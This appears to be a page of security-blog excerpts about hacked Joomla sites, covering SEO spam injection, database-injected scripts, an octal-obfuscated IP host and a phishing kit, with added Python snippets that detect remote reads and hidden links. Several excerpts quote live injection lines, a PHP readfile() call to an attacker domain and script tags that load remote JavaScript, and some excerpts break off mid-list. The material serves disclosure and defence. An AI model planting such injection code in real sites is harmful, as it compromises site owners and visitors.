Blackhat SPAM SEO From Joomlapoject.net – Targeting Joomla

We are tracking another Blackhat SEO SPAM network being managed by http://joomlapoject.net. By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://www.nigeriavillagesquare.com/t3-assets/css/index.php">ACD Systems Canvas 11 with GIS Plus</a><br><a href="http://www.nigeriavillagesquar…. hundreds more links…

All those links are generated by http://joomlapoject.net/component.php (or global.php), which gets called on the Joomla site by the following code added to the template's index.php:

<?php readfile("http://joomlapoject.net/component.php");

If you have a Joomla site, make sure it is updated. You can check whether it has been compromised with this crud by viewing the source of your site, or by scanning it here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.

What’s interesting is that if you search for joomlapoject.net on Google, you will get thousands of sites found because of this warning:

“Warning: readfile(http://joomlapoject.net/component.php)” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or …

This probably happened when the joomlapoject site was down, causing all those errors.
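The manual check described above can be scripted. This is an added example, not code from the original post or from the SiteCheck scanner: it flags PHP calls that read from a remote URL, as the injected readfile() line does, and lists links nested inside a hidden element. The function names, the sample page and the spam-*.example hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# PHP calls that read or include a remote URL, like the injected readfile() line.
REMOTE_READ = re.compile(
    r"""\b(readfile|include(?:_once)?|require(?:_once)?|file_get_contents)"""
    r"""\s*\(?\s*["'](https?://[^"']+)""", re.I)
HIDING = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
VOID = {"br", "img", "hr", "input", "meta", "link"}  # tags with no end tag

def remote_reads(php_source):
    """Return (function, url) pairs for PHP calls that pull content from a URL."""
    return [(m.group(1).lower(), m.group(2)) for m in REMOTE_READ.finditer(php_source)]

class HiddenLinkFinder(HTMLParser):
    """Collect hrefs of <a> tags that sit inside an element styled as hidden."""

    def __init__(self):
        super().__init__()
        self.stack = []          # one flag per open element: is it styled hidden?
        self.hidden_links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDING.search(attrs.get("style") or ""))
        if tag == "a" and attrs.get("href") and (hidden or any(self.stack)):
            self.hidden_links.append(attrs["href"])
        if tag not in VOID:
            self.stack.append(hidden)

    def handle_endtag(self, tag):
        # Heuristic: assumes reasonably balanced markup.
        if tag not in VOID and self.stack:
            self.stack.pop()

def hidden_links(html):
    """Return every link target that sits inside a hidden container."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    return finder.hidden_links

# Constructed samples: the template line quoted above and a page shaped like the spam block.
TEMPLATE = '<?php readfile("http://joomlapoject.net/component.php");'
PAGE = ('<body><span style="visibility: hidden; position: absolute; left: 0px">'
        '<a href="http://spam-one.example/a">x</a><br><a href="http://spam-two.example/b">y</a>'
        '</span><a href="/contact">Contact</a></body>')
```

Run `remote_reads()` over template files on disk and `hidden_links()` over the HTML the site actually serves; a long list from the second is the signature of this kind of injection.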



Database Injection on Joomla Websites – yourstatscounter dot cz dot cc

It seems that a good number of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly into their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point).

This is what is being added to the infected sites (at the top of every post in the jos_content table):

<script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js"></script>

There are many other domains being used in this attack, including:



Malware week – 0133.0331.0242.0033, javadisplay and more

Very busy week in terms of malware. First Hilary Kneber decided to make a comeback, inlovebot.com and crazymasya.com reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address 91.217.162.27 in octal).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..
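An added example (not from the original post) of how a scanner can catch this kind of host obfuscation: it decodes octal, hex and single-integer IPv4 literals the way inet_aton() does and reports script sources whose host is written in a non-canonical form. It goes beyond the octal case shown above, and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit

SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def parse_part(part):
    """Parse one dotted component like inet_aton(): 0x hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    raise ValueError(part)


def canonical_ipv4(host):
    """Return dotted-decimal for an inet_aton-style IPv4 literal, or None for a hostname."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [parse_part(p) for p in parts]
    except ValueError:
        return None
    # Leading parts are single bytes; the last part fills all remaining bytes.
    tail_bytes = 5 - len(nums)
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** tail_bytes:
        return None
    value = nums[-1]
    for i, n in enumerate(nums[:-1]):
        value |= n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 255) for shift in (24, 16, 8, 0))


def obfuscated_script_hosts(html):
    """Return (host, decoded_ip) for script sources whose host is a non-canonical IPv4 literal."""
    found = []
    for src in SCRIPT_SRC.findall(html):
        host = urlsplit(src).hostname or ""
        ip = canonical_ipv4(host)
        if ip and ip != host:
            found.append((host, ip))
    return found
```

Decoding before matching also lets one blocklist entry for 91.217.162.27 cover every alternate spelling of the address.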



Chase phishing – case study

Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:

Your account was reported to us by Google for malicious content and has been deactivated.

We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; The file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.

Nothing really unusual as we see this many times a day.

However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…

When we looked at the content, it had 3 files:


Grameen Bank web site hacked / infected with spam

The Grameen Bank is in the news today after one of its founders, Muhammad Yunus, was fired from it. You can see the news about it here.

Leaving the politics aside, what interested us is that their main web site is currently hacked and infected with blackhat SEO spam. We tried to contact them a few weeks ago about it, but got no reply (and the site remains hacked).

Even Google recently started to warn users about it with the following message: “This site may be compromised.” in the search results. Just search for “inurl:grameen.com” to verify it.

Grameen bank malware

How did they get hacked? They are using a very old version of Joomla, which is probably how the attackers were able to get in. Our malware / spam scanner also finds those issues. The spam is only displayed to crawlers (not to normal users), which is a common blackhat SEO technique to increase page rank.

This is the result of our scanner: http://sitecheck.sucuri.net/scanner/?scan=http://www.grameen.com/.

This shows again the importance of keeping your sites updated and always monitored.

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number of Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file, which contacts 188.72.201.11 and 209.160.33.108 to retrieve the list of links to display:
